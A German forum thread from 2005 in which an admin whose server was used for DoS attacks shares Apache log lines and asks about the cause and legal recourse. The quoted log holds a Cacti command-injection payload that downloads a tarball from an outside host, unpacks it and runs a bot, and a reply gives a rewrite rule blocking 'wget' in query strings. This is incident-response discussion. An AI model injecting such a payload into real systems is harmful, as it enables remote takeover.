Server gesperrt / DoS

[jazziroquai]

Hi,
mein Server ist gesperrt worden, da von ihm DoS Angriffe ausgingen. Habe ihn heute entsperren lassen und die logs angeschaut. Folgende Zeilen tauchen in den logs oft auf:

208.7.141.2 - - [10/Jul/2005:14:44:08 +0200] "GET /cacti/graph_image.php?local_graph_id=15&graph_start=%0acd%20%2fvar%2ftmp%3bwget%20www.geocities.com%2fhackroot2000%2fza.tgz%3btar%20-zxvf%20za.tgz%3bcd%20za%3b.%2fzbind%0a HTTP/1.0" 200 173 "-" "-"

und mit

graph_start=%0akillall%20-9%20shellbot%0

Kann man definitiv sagen, dass die Bugs in der veralteten Cacti Version die Ursache für den erfolgreichen Angriff waren, oder ist das nur ein Versuch eine Datei auf dem Server auszuführen, der nicht unbedingt geglück ist?

Wie sieht es denn rechtlich aus? Wenn die ip zu einem deutschen Provider gehören würde, würde ich ohne zu überlegen Anzeige erstatten, aber laut whois gehört die ip zu "Harvest Meat Company" in den USA, National City, Californien. Hat es überhaupt Sinn da rechtliche Schritte zu unternehmen? Hat jemand schon mit sowas Erfahrung?
Für Infos wäre ich dankbar.

[timeless2]

Schau doch mal nach, ob du in den entsprechenden Verzeichnissen die Skripte findest.

[chaosad]

liegen unter /var/tmp/ irgendwelche Files?

[jazziroquai]

Hab den Server nach der Sicherung der wichtigen Daten neuinitialisiert. Kann nach den Scripten leider nicht mehr suchen. Sind die Einträge in apache logs irgendwie eindeutig zu bewerten oder kann das alles mögliche gewesen sein?

[timeless2]

Hab den Server nach der Sicherung der wichtigen Daten neuinitialisiert.

Gut so.

Ob es das wirklich war, da kann man jetzt nur spekulieren. Wenn es zeitlich hinkommt, ist das gut möglich.

Code: Select all

RewriteEngine On
 RewriteCond %{QUERY_STRING} (.*)wget%20 [NC]
 RewriteRule .* http://256.256.256.256/ [R=301,L]

Mit diesem Eintrag bei den vhosts kannst du in Zukunft dem Problem vorbeugen. Natürlich soll das nur eine zusätzliche Absicherung sein.

[chaosad]

evtl. wär auch mod-security noc hwas für dich

[jazziroquai]

Danke. Und wie sieht es mit der rechtlichen Seite aus? Abgesehen von der dürftigen Beweislage im meinem Fall kennt jemand Fälle, dass wegen Serverhackens geklagt wurde, in Deutschland oder im Ausland und ob es zum Erfolg führte.

[kawfy]

Da du den Server frisch aufgesetzt hast, sind die Daten == Beweise bis auf das Apache-Log wohl erstmal futsch?

:arrow: Du kannst bei der Polizei einen Strafantrag gg. Unbekannt stellen. Dein Antrag kommt dann erstmal unter einen großen Stapel (FIFO). :( Der Angriff kam von einem Server, der wahrscheinlich selbst aufgemacht worden war (Harvest Meat ...). Von dort aus müsste man also weitersuchen. :?

=> die Untersuchung deines Falles dürfte sich also lange hinziehen und macht Recherchen im Ausland nötig. Es ist fraglich, ob sich das lohnt -- das kommt auf deinen Schaden, deinen Geldbeutel (Anwalt?) und dein Durchhaltevermögen an.

:idea: Falls deine User/Kunden/Auftraggeber darauf bestehen, stelle den Strafantrag, erwarte aber, dass das Verfahren in ein paar Monaten eingestellt wird. Falls nicht: finde dich damit ab, denn so ein Fall ist leider "normal". :x

Zitat eines Produktmanagers eines großen Server-Hosters in einer gerade noch aktuellen Internet-Zeitschrift: "[DoS-Attacken von geknackten Rootservern] Dies kommt rund zwei bis drei Mal am Tag vor." 8O